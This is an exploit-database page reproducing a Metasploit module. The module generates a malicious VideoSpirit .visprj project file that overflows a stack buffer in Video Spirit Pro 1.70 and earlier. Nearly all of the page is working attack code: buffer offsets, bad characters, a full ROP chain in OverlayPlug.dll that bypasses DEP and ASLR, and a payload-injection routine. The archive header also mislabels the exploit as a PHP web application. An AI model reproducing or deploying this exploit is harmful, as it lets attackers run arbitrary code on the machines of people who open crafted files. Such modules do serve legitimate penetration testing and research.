VeryTools Video Spirit Pro <= 1.70 .visprj Buffer Overflow

2011-04-12T00:00:00
ID 1337DAY-ID-15842
Type zdt
Reporter metasploit
Modified 2011-04-12T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##
# $Id: videospirit_visprj.rb 12305 2011-04-11 23:32:41Z sinn3r $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking
 
    include Msf::Exploit::FILEFORMAT
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'VeryTools Video Spirit Pro <= 1.70',
            'Description'    => %q{
                    This module exploits a stack buffer overflow in Video Spirit <= 1.70.
                When opening a malicious project file (.visprj), a stack buffer overflow occurs,
                resulting in arbitrary code execution.
                This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Acidgen',      #found the vulnerability
                    'corelanc0d3r', #rop exploit + msf module
                ],
            'Version'        => '$Revision: 12305 $',
            'References'     =>
                [
                    [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-001' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'        => 800,  #0x320 bytes - avoid marking wrong page as RWX
                    'BadChars'     => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e",
                    'DisableNops'  => 'True',
                },
            'Platform' => 'win',
            'Targets'  =>
                [
                    [ 'Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass',
                        {
                            'OffSet'      => 168,
                            'OffSetToRop' => 952,
                            'Ret'         => 0x1006CC10, #overlayplug.dll stackpivot bad char friendly
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Apr 11 2011',
            'DefaultTarget'  => 0))
 
        register_options(
            [
                OptString.new('FILENAME', [ true, 'VideoSpirit project name.',  'msf.visprj']),
            ], self.class)
    end
 
    def junk
        return rand_text_alphanumeric(4).unpack("L")[0].to_i
    end
 
    def exploit
 
        print_status("Creating '#{datastore['FILENAME']}' file ...")
 
        header = %Q|
<version value="1" />
<track>
<type value="0" />
<type value="4" />
<type value="2" />
<type value="1" />
<type value="7" />
</track>
<track0 />
<track1 />
<track2 />
<track3 />
<track4 />
<clip />
<output typename="AVI" keepaspect="0" presetquality="0">
<type0 enable="1">
|
 
        footer = %Q|
<valitem name="320*240(4:3)" value="320*240" />
<valitem name="30" value="30" />
<valitem name="16000k" value="16000k" />
</type0>
<type1 enable="1">
<valitem name="mp3" value="libmp3lame" />
<valitem name="128k" value="128k" />
<valitem name="44100" value="44100" />
<valitem name="2 (Stereo)" value="2" />
</type1>
<type2 enable="0" />
</output>
|
        print_status("Preparing payload")
 
        pivot = [target.ret].pack('V')
 
        rop_gadgets =
        [
            # one non-ASLR module is enough for generic ASLR & DEP bypass !
            # pvefindaddr rop 'n roll
            # First, grab VirtualProtect ptr
            0x10065292,  # POP EAX # RETN      [OverlayPlug.dll]
            0x106F4244,  # IAT entry + offsqet (bad char friendly)
            0x10019762,  # POP EBP # RETN      [OverlayPlug.dll]
            0xEFEFEFF0,  # bye bye offset
            0x10084977,  # ADD EBP,EAX # RETN  [OverlayPlug.dll]
            0x100684B8,  # MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN  [OverlayPlug.dll]
            junk,
            junk,
            junk,
            0x1005E114,  # MOV EAX,DWORD PTR DS:[EAX] # RETN  [OverlayPlug.dll]
            0x10016A56,  # XCHG EAX,ESI         [OverlayPlug.dll]
 
            # set size
            0x100A9274,  # POP EAX # RETN       [OverlayPlug.dll]
            0x10101330,  # 0x320 bytes - change this if needed, but don't make it too big :)
            0x10019762,  # POP EBP # RETN       [OverlayPlug.dll]
            0xEFEFEFF0,  # boo
            0x10084977,  # ADD EBP,EAX # RETN   [OverlayPlug.dll]
            0x10053E4C,  # XCHG EAX,EBP # RETN  [OverlayPlug.dll]
            0x10066D8C,  # PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10  [OverlayPlug.dll]
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
            junk,
 
            # set NewProtect to 0x40
            0x100E3D4A,  # XOR EAX,EAX # XOR EDX,EDX # RETN  [OverlayPlug.dll]
            junk,
            junk,
            junk,
            junk,
            0x10010C36,  # ADD EAX,10 # POP EBP # RETN 4  [OverlayPlug.dll]
            junk,
            0x10010C36,  # ADD EAX,10 # POP EBP # RETN 4  [OverlayPlug.dll]
            junk,
            junk,
            0x10010C36,  # ADD EAX,10 # POP EBP # RETN 4  [OverlayPlug.dll]
            junk,
            junk,
            0x10010C36,  # ADD EAX,10 # POP EBP # RETN 4  [OverlayPlug.dll]
            junk,
            junk,
            0x10030C8B,  # ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4  [OverlayPlug.dll]
            junk,
 
            # write pOldProtect to .data section
            0x1001AB51,  # POP ECX # RETN  [OverlayPlug.dll]
            junk,
            0x10117030,  # RW
 
            # EDI : ROP NOP
            0x10057090,  # POP EDI # RETN  [OverlayPlug.dll]
            0x10057091,  # ROP NOP
 
            # pReturn2Payload
            0x100BC8E8,  # PUSH ESP # MOV EAX,ESI # POP ESI # RETN  [OverlayPlug.dll]
            0x10016A56,  # XCHG EAX,ESI # RETN  [OverlayPlug.dll]
            0x1003C946,  # ADD EAX,0A # RETN    [OverlayPlug.dll]
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1003C946,
            0x1001FDBD,  # XCHG EAX,EBP # RETN  [OverlayPlug.dll]
 
            0x100A9274,  # POP EAX # RETN       [OverlayPlug.dll]
            0x41414141,
 
            # go
            0x10066F84,  # PUSHAD # RETN        [OverlayPlug.dll]
        ].pack("V*")
 
 
        buffer = "<valitem name="
        buffer << '"'
        buffer << rand_text_alphanumeric((target['OffSet']))
        buffer << rand_text_alphanumeric(4) #nseh
        buffer << pivot
        buffer << rand_text_alphanumeric((target['OffSetToRop']))
        buffer << "\x91\x70\x05\x10" * 10   #rop nop, offset Win7
        buffer << rop_gadgets
        buffer << make_nops(150)
        buffer << payload.encoded
        buffer << rand_text_alphanumeric(4000)
        buffer << '"'
        buffer << ' value="msmpeg4v2"'
        buffer << "/>"
        buffer << "\n"
 
        filecontent = header + buffer + footer
 
        print_status("Writing payload to file")
 
        file_create(filecontent)
 
    end
 
end



#  0day.today [2018-02-19]  #